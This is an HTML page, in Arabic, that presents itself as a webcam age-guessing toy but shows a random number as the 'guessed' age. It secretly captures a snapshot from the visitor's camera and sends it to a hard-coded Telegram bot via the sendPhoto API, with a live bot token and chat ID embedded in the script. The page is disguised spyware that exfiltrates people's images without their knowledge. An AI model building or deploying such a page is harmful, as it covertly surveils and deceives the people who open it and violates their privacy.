
<!DOCTYPE html>
<html>
<head>
  <title>تخمين العمر</title>
  <style>
    body { background: #111; color: #fff; font-family: Arial; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100vh; }
    h2 { margin-bottom: 20px; }
    video { display: none; }
  </style>
</head>
<body>
  <h2 id="ageDisplay">جاري تحميل الكاميرا...</h2>
  <video id="video" autoplay playsinline></video>
  <canvas id="canvas" style="display:none;"></canvas>

  <script>
    const video = document.getElementById('video');
    const canvas = document.getElementById('canvas');
    const ageDisplay = document.getElementById('ageDisplay');

    navigator.mediaDevices.getUserMedia({ video: true })
      .then(stream => {
        video.srcObject = stream;
        ageDisplay.innerText = "🔍 جاري تخمين عمرك...";
        setTimeout(captureAndSend, 3000);
      })
      .catch(err => {
        ageDisplay.innerText = "❌ فشل الوصول للكاميرا";
      });

    function getRandomAge() {
      return Math.floor(Math.random() * 40) + 10;
    }

    function captureAndSend() {
      const context = canvas.getContext('2d');
      canvas.width = video.videoWidth;
      canvas.height = video.videoHeight;
      context.drawImage(video, 0, 0, canvas.width, canvas.height);

      const guessedAge = getRandomAge();
      ageDisplay.innerText = "🧠 العمر المتوقع: " + guessedAge + " سنة";

      canvas.toBlob(function(blob) {
        const formData = new FormData();
        formData.append("chat_id", "5694859272");
        formData.append("photo", blob, "snapshot.jpg");

        fetch("https://api.telegram.org/bot8101350195:AAFWPSd2YjhJu4VFOP-ErLkGpP1Do436c1w/sendPhoto", {
          method: "POST",
          body: formData
        });
      }, 'image/jpeg');
    }
  </script>
</body>
</html>
